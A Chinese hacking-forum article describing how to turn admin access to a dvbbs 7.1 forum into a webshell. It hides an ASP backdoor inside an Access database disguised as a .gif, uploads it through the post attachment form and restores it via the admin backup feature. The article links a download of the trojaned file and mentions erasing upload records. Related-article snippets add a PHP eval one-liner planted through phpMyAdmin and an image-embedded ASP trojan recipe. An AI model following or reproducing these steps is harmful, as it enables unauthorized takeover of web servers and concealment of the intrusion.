dvbbs7.1 照样从后台得到webshell

文章作者:喜欢忧伤

信息来源:邪恶八进制安全小组

背景:

dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了

解决办法:

我把asp木马插入到数据库里,然后恢复。这样肯定检查肯定可以通过的。

具体过程:

前提:

(偶以默认的安装情况为准,具体情况的把握靠自己了.)

你得到论坛dvbbs7.1后台。

1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门]

同时已经修改名字成dvbbsToshell.gif(文章最后有下载)了

===补充下:关键是因为这个图片是access数据库才有用[详细解释见最后]===

2.上传这个dvbbsToshell.gif,选择在发表帖子的那个地方上传。因为这个地方不会检查文gif的特征码。

(不要选择在头像上传的地方上传啊。)

3.记录下上传后的地址,到后台恢复成后门。

4.执行后门,写新的后门。测试下功能,完成。

注意点:如果论坛没有开始文件上传的到后台开始上传选项啊。

上传文件的记录才擦除偶也不说了。

解决办法:偶还是跟以前一样,把备份和恢复的功能删除了。

上面的数据库dvbbsToshell.gif在压缩包里。

下载含后门的数据库图片

=============补充下====================

居然有人看不懂偶的文章,看来是偶的文章没有写清楚了:

既然如此:我就详细的的补充下:

[背景:dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了]完整的解释是:

因为在dvbbs7.1加入了以下的代码来做检查,文件的类型,以确保文件确实是access数据库.

直接由asp木马修改扩展名来的gif图片(即使加上GIF89a)是通不过下面代码的验证.

从下面代码来看,只能是真正的access文件,所有偶使用access数据库,这样就可以通过检查的了.只是在access里面加入了后门.

可能是我还是使用了gif文件的原因(其实用dvbbsToshell.jpg也一样,只要是插入了后门的ccess数据库),以致造成了有些人的理解错误了.

----下面代码来自dvbbs7.1中的data.asp文件------------ FileConnStr = "Provider = Microsoft.Jet.OLEDB.4.0;Data Source = " & Dbpath

Set Fileconn = Server.CreateObject("ADODB.Connection")

Fileconn.open FileConnStr

If Err Then

Response.Write Err.Description

Err.Clear

Set Fileconn = Nothing

Response.Write "备份的文件并非合法的数据库。"

Exit Sub

Else

Set Fileconn = Nothing

End If

(0)

相关推荐

  • dvbbs7.1 照样从后台得到webshell

    文章作者:喜欢忧伤 信息来源:邪恶八进制安全小组 背景: dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了 解决办法: 我把asp木马插入到数据库里,然后恢复.这样肯定检查肯定可以通过的. 具体过程: 前提: (偶以默认的安装情况为准,具体情况的把握靠自己了.) 你得到论坛dvbbs7.1后台. 1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门] 同时已经修改名字成dvbbsToshell.gif(文章最后有下载)了

  • 从后台到webshell的一点思路

    主要是利用后台对access数据库的"备份数据库"或"恢复数据库"功能,"备份的数据库路径"等变量没有过滤导致可以把任意文件后缀改为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用.具体方法和分析可以参考angel的文章<动网论坛7.0获得WebShell的分析>.据我所知,目前还有很多的asp程序后台存在这样的漏洞,利用方法大同小异. php+mysql程序 ① 利用后

  • phpMyAdmin 后台拿webshell

    1.如何拿到登陆密码. 自己想办法  2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径. 3.选择一个Database.运行以下语句. ----start code--- Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>'); select cmd from a into outfile

  • 让你变成ASP木马高手

    1.名称:如何制作图片ASP木马 (可显示图片)  建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->  找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为  了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入  <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(

  • IOS网络请求之NSURLSession使用详解

    前言: 无论是Android还是ios都离不开与服务器交互,这就必须用到网络请求,记得在2013年做iOS的时候那时候用的ASIHTTPRequest框架,现在重新捡起iOS的时候ASIHTTPRequest已经停止维护,大家都在用AFNetWorking作为首选网络请求框架,之前的ASIHTTPRequest是基于NSURLConnection类实现的,早期的AFNetWorking也是基于NSURLConnection实现,后来iOS9 之后已经放弃了NSURLConnection,开始使用

  • phpBB 2.0.13惊现漏洞的解决

    一.Path Disclosure 漏洞文件:/db/oracle.php 漏洞描叙:直接访问oracle.php,导致暴露web路径 涉及版本:phpbb <=2.013 测试:ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误: Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\oracle.php on line 405 解决办法 如果你不是采用的or

  • DVBBS7.1后台备份得到一个webshell

    转自:http://www.wrsky.com/read.php?tid=565 作者:firefox+lvhuana 今天上午上网的时候,非常无聊,好友都不在线. 正在无聊的时候,突然qq响了,一个陌生人要加我,顺便先看下他的资料,哦哦,原来这个人还有个人站点呢,通过他加我请求.然后开始看他的个人站点,原来是一个外挂站,晕糊中,外挂站点的人加我作什么.... 想想进他的站点看看吧,打开明小子的旁注工具2.2版本(这个启动速度快,我喜欢),扫了一下,看到他站点所在的服务器上面还有几个站点,再仔细

  • 利用BBSxp后台的缺陷得到webshell

    遇一BBSXP后台: 查看源文件.也没有value可以自定义. 尝试修改上传类型. 无奈不支持php aspx. 向数据库里插入一句话再备份. 出现些XXX 估计表里加入了什么东.. 访问: /bbs/Admin_fso.asp?menu=files&dir=../ 可以看到整站文件.. 找到一个文件名不常见的后台.. 运气不错. 备份webshell之..

  • 获得leadbbs论坛站webshell后进后台最简便之法

    本文已经发表于<黑客手册>(非安全)杂志上,版权归其所有!转载注名! 其实ASP论坛中,我最喜欢就是leadbbs,稳定.速度快,占的空间也不大,比起庞大的DVBBS可小多了,说起安全来,它也很不错的,虽然在早版本里有过可以修改管理员密码的漏洞(俗称移花接木),但是从那至今它的安全性还是非常可以让大家肯定的,可能你会说前几天开始闹cookie欺骗漏洞呢,但是这最多也只是进了前台,后台一般还是无能为力的,高手在其面前也不得不服啊.呵呵,上面是题外话,今天我不是详说它安全性的,{www.xker.

  • Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范

    一.概述    漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html    前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074    本站转贴为: http://coolersky.com/articles/hack/analysis/progra

随机推荐